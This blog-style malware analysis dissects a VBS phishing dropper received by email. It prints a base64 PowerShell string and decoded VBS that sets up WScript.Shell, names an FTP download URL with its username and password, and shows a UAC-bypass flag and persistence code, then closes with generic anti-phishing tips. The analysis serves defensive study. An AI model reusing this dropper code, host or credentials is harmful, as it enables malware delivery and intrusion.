By Laura Cardillo and Átila Altoé: This is an analysis of a file transformed to VBS language, which is a phishing file file received via email by a third-party account. The focus of this report is not to explain in detail how the malware itself works - but rather to present a way to identify and decode the payload that disseminates it.
In this report we will demonstrate how the analysis was performed using VBS to identify and fuzzy the malicious code and execution of this malware.
Watch the Malware Action
The extracted sample in question is shown below:
To begin the analysis, we inspected the file via Notepad++ and noted the presence of a Powershell command command to decode stringsstrings in base64. Unfortunately, the target content of this shortcut is too long for the file's properties window. Here follows the obtained string:
“b24gZXJyb3IgcmVzdW1lIG5leHQNCkRpbSB3aW5zaGVsbA0KU2V0IHdpbnNoZWxsID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKQ0KVGltYmFsYXRlID0gInNldHVwLnppcCINClRpbWJhbGF0ZXMgPSAic2V0eC5leGUiDQpVUkwgPSAiZnRwOi8vZnRwLmVzdGFtb3NhaW5hbmEuY29tL3d3dy9pbWFnZW5zLnppcCINClBBQ09URVVTRVIgPSAiZXN0YW1vc2FpbmFuYSINClhBTlBVU0VSID0gInBRTlBlNnZeOTFUWCINCkRpbSBCYWdhbmVGb2xkDQpCYWdhbmVGb2xkID0gd2luc2hlbGwuZXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIlQWxsVXNlcnNQcm9maWxlJSIpDQpEZXN0Rm9sZGVyID0gQmFnYW5lRm9sZCAmICJcU2V0WCINCkRpbSBvYmpXTUlTZXJ2aWNlLCBwcm9jZXNzSXRlbXMsIHByb2Nlc3NOYW1lDQpwcm9jZXNzTmFtZSA9ICJ3c2NyaXB0LmV4ZSINCkRpbSBqb3JkaQ0Kam9yZGkgPSBXU2NyaXB0LlNjcmlwdEZ1bGxOYW1lDQpGT1JDRSA9ICJTSU0iDQpVQUNCWVBBU1MgPSAiTkFPIg0KU2V0IHhtbCA9IENyZWF0ZU9iamVjdChTdHJSZXZlcnNlKCJ0Zm9zb3JjaU0iKSYgIi4iICYgU3RyUmV2ZXJzZSgiUFRUSExNWCIpKQ0Kc2V0IGphcmRpbVhYWFhYWCA9IENyZWF0ZU9iamVjdChQcm9mZXNzb3JhKCJjMCtcNCIsIk4wWCIpICYgIi4iICYgU3RyUmV2ZXJzZSgibm9pdGFjaWxwcEEiKSkNCkNvbnN0IGFkVHlwZUJpbmFyeSA9IDENCkNvbnN0IGFkU2F2ZUNyZWF0ZU92ZXJXcml0ZSA9IDINCkNvbnN0IGFkU2F2ZUNyZ
As it is humanly impossible to understand this type of string, to decode it we used the help of the cyberchef tool, with which we found the following function:
on error resume next
Dim winshell
Set winshell = WScript.CreateObject("WScript.Shell")
Timbalate = "setup.zip
Timbalates = "setx.exe"
URL = "ftp://ftp.estamosainana.com/www/imagens.zip"
PACOTEUSER = "we areainana"
XANPUSER = "pQNPe6v^91TX"
Dim BaganeFold
BaganeFold = winshell.expandEnvironmentStrings("%AllUsersProfile%")
DestFolder = BaganeFold & "\SetX
Dim objWMIService, processItems, processName
processName = "wscript.exe"
Dim jordi
jordi = WScript.ScriptFullName
FORCE = "YES
UACBYPASS = "NO
From the beginning of the function, you can see some points of attention such as URL, user and password referring to the account performing the attack, or even that the attacker uses an FTP server for spreading the malicious files, as well as the name of the files that will be used in the infection:
When discussing the function further, it was also found that an attempt was made to create a user ("Fisga"). This went through a process of Reverseprocess, thus elevating his privilege and making him "root".
Finally, it is also noted that the malware uses a specific expression at the end of the function to perform the Persistence tactic (MITRE ATT&CK) and force the user to accept "root"access noted below:
Else
rotate
exec
End If
ElseIf UACBYPASS = "YES" Then
rotate
execc
Else
rotate
exec
End If
End Function
Recommendations
The first important tip to keep in mind is that most reputable companies do not ask for personal information or account details by e-mail. This includes your bank, insurance companies, and any company with which you do business. If you receive an e-mail asking for any kind of account information, delete it immediately and call the company to confirm that your account is secure.
- Do not open attachments from these suspicious or strange e-mails, especially Word, Excel, PowerPoint or PDF attachments.
- A useful phishing prevention tip is to always avoid clicking on links embedded in e-mails, because these may be loaded with malware.
- Another way to reduce your exposure to phishing messages is to use virus protection and anti-spam software.
Finally, it is critical to use a password manager to manage credentials. It is recommended to have a password manager, since malicious attackers will try to use the discovered credentials across the web. One of the best features of password managers is automatic filling of login forms to minimize clicks.
References
- Incoming file via honeypot and use of Open source tools.
- https://www.kaspersky.com.br/resource-center/preemptive-safety/phishing-prevention-tips